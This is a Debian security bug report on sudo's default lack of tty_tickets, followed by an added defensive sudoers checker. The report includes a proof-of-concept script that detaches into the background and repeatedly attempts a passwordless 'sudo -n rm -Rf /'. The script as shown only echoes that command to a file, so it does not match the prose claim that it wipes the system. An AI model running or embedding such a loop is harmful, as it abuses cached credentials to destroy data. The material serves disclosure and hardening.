François Boisson
2010-Jan-30 07:39 UTC
[Secure-testing-team] Bug#567614: sudo's default configuration without tty-tickets
Package: sudo
Version: 1.7.2p1-1
Severity: critical
Tags: security
Justification: root security hole
sudo's default configuration has a timestamp timeout of 15 minutes
and no tty_tickets.
So with the classic addition of one user (just adding
superman ALL=(ALL) ALL
as is done in Ubuntu for instance), a simple script like
#!/bin/sh
# First call (no argument): print our own path, re-launch this same
# script in the background with a dummy argument, detached from the
# terminal, and return. Running it with "sh" instead of sourcing it
# keeps it portable: "." with extra arguments is not POSIX and dash
# would ignore "vasy", making the script source itself forever.
if [ -z "$1" ] ; then
  FILE=$0
  echo "$FILE"
  sh "$FILE" vasy > /dev/null 2> /dev/null &
else
  # Background loop: every 60 seconds, attempt a non-interactive sudo
  # (-n: never prompt). Without tty_tickets it succeeds with no password
  # as soon as the user has authenticated with sudo on any tty in the
  # last 15 minutes. Here the command is only echoed into a file rather
  # than executed.
  while /bin/true ; do
    echo sudo -n rm -Rf / >> /tmp/grrrr
    sleep 60
  done
fi
called once by superman, erases the file system as soon
as a sudo call is made. This configuration is very widely used.
The package must either be configured with tty_tickets in the sudoers
file, or compiled with the option --with-tty-tickets. This solves
the problem.
François Boisson (sorry for my English mistakes)
-- System Information:
Debian Release: squeeze/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-2-amd64 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages sudo depends on:
ii libc6 2.10.2-2 GNU C Library: Shared libraries
ii libpam-modules 1.1.0-4 Pluggable Authentication Modules f
ii libpam0g 1.1.0-4 Pluggable Authentication Modules l
sudo recommends no packages.
sudo suggests no packages.
-- no debconf information
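Added example, not part of François Boisson's report or of the sudo package: a sudoers fragment in the stock layout (nothing said about tickets, so the compiled-in defaults the report describes apply) beside the hardened fragment the report asks for, and a small POSIX sh/awk checker that reads a sudoers file and prints the effective tty_tickets and timestamp_timeout values. The checker is mine; both sample files are constructed, the baseline it assumes (tty_tickets off, 15-minute timeout) is taken from the report, and it only honours plain "Defaults" lines.

```shell
#!/bin/sh
# Added example, not part of the bug report or of the sudo package.
# Print the effective tty_tickets / timestamp_timeout for a sudoers file
# read on stdin. Only plain "Defaults" lines are honoured; per-host/user/
# runas/command Defaults (Defaults@, Defaults:, Defaults>, Defaults!) and
# #include directives are skipped, so this is a first pass, not an audit.
sudoers_effective() {
    awk '
        # Assumed compiled-in baseline (as described in the report):
        # tty_tickets off, 15 minute timeout.
        BEGIN { tty = "off"; timeout = 15 }
        {
            sub(/#.*/, "")                 # drop comments (and #include lines)
            if ($1 != "Defaults") next
            $1 = ""                        # keep only the option list
            n = split($0, opts, ",")
            for (i = 1; i <= n; i++) {
                o = opts[i]
                gsub(/^[ \t]+|[ \t]+$/, "", o)
                if (o == "tty_tickets") tty = "on"        # last one wins
                else if (o == "!tty_tickets") tty = "off"
                else if (o ~ /^timestamp_timeout[ \t]*=/) {
                    split(o, kv, "=")
                    v = kv[2]; gsub(/[ \t]/, "", v)
                    timeout = v
                }
            }
        }
        END { printf "tty_tickets=%s timestamp_timeout=%s\n", tty, timeout }
    '
}

# Constructed sample sudoers files (not copied from any real system).
# Stock-style file: nothing about tickets, so the baseline above applies
# and one "sudo" on any tty unlocks "sudo -n" everywhere for 15 minutes.
STOCK_SUDOERS=$(cat <<'EOF'
# /etc/sudoers (stock-style)
Defaults        env_reset
root            ALL=(ALL) ALL
superman        ALL=(ALL) ALL
EOF
)

# Hardened file: the tty_tickets fix the report asks for, plus a shorter
# timeout so a leftover ticket on the same tty is worth less.
HARDENED_SUDOERS=$(cat <<'EOF'
# /etc/sudoers (hardened)
Defaults        env_reset, tty_tickets, timestamp_timeout=5
root            ALL=(ALL) ALL
superman        ALL=(ALL) ALL
EOF
)

check_stock()    { printf '%s\n' "$STOCK_SUDOERS"    | sudoers_effective; }
check_hardened() { printf '%s\n' "$HARDENED_SUDOERS" | sudoers_effective; }

echo "stock:    $(check_stock)"
echo "hardened: $(check_hardened)"
```

Run it against a real file with "visudo -c" first and then "sudoers_effective < /etc/sudoers"; anything living in Defaults:user lines or in #include'd files will not be picked up by this checker and has to be read by hand.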